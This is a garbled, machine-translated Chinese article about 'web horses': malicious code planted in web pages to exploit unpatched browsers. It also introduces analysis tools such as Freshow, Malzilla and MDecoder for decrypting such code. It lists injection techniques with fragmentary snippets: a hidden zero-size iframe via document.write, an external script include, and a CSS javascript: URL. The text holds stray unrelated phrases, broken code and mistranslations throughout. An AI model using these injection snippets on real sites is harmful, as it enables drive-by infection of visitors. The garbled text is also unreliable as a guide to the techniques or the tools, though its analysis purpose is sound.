by kongzi
one. pages linked to the concept of the horse:
pages linked to horse means: the web site or web server for some or all of the permissions in the file,
爱惜每句话, insert a malicious Web page code, the malicious code,
[Transfer] the perfect her husband's work schedule, including IE, mainly some exploit code,
Squeeze a JB, and users to access a page linked to the horse, if the system is not updated the use of malicious code vulnerability patch, malicious code is executed procedures, hacking and other dangerous operations.
II. common web hanging horse way:
1. framework linked to horse:
2. js files linked to horse:
First, the following code:
document.write (\0 height = 0 src = 'Address'> \language = javascript src = xxx.js>
3. js deformation encryption
5. does not point appears linked Trojan
body {background-image: url ('javascript
: document.write (\SCRIPT language = javascript>
window.open (\= 1, height = 1 \width = 0>
[img]\camouflage[/img]
1. According to a malicious Web site names to determine the vulnerability:
2. CLSID judged according to vulnerability:
common net horse decryption tool:
1.Freshow Tool (author: jimmyleo Daniel)
Tools Overview (from freshow help document): Freshow is a tool to decrypt the script, the development of the original intention is to reduce the mechanical operations and simplify the processing steps, so you can focus on the script itself. Decryption methods are generally two types of manual and tools, Freshow make as much as possible to complete work in a tool, of course, it is not as mature, you can be used with other tools to complete the work. Freshow currently have filters and decryption modules to meet the common cryptographic operations needed for the analysis. Its performance and stability of the final results still depends on your Freshow familiarity, knowledge and understanding of the script and the analysis level.
2.HTMLDecoder (of: Shoko Daniel)
tools Description: This is an automatic decryption tool is very powerful, but unfortunately I still study it, not very deep. Used it only horse and decrypted pdf flash web network horse.
3.malzilla known artifact
tools Description: This tool is a very powerful, freshow horse can not be solved in the network, use this tool can be solved basically.
4.MDecoder (wheat, Daniel)
tool profile (taken from the wheat fields of the blog):
1, Freshow imitators, the use of WIN32 compilation of writing.
2, support network in the swf and exe horse lookup (incomplete).
3, horse identification support network can be augmented by modifying classid.ini features.
so much time being first introduced, there are many auxiliary tools such as follow-up will introduce to you one by one.